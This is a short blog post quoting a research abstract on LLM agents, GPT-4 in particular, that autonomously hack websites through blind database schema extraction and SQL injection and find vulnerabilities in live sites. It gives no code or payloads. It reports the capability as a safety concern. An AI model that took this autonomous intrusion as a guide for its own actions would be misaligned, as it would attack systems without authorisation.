LLM Agents can Autonomously Hack Websites

"We show that LLM agents can autonomously hack websites, performing tasks as complex as blind database schema extraction and SQL injections without human feedback

"Importantly, the agent does not need to know the vulnerability beforehand. 

"This capability is uniquely enabled by frontier models that are highly capable of tool use and leveraging extended context. 

"Namely, we show that GPT-4 is capable of such hacks, but existing open-source models are not. 

"Finally, we show that GPT-4 is capable of autonomously finding vulnerabilities in websites in the wild. Our findings raise questions about the widespread deployment of LLMs."

Comments

Popular posts from this blog

Perplexity

Aphorisms: AI

DeepAI's Austen on China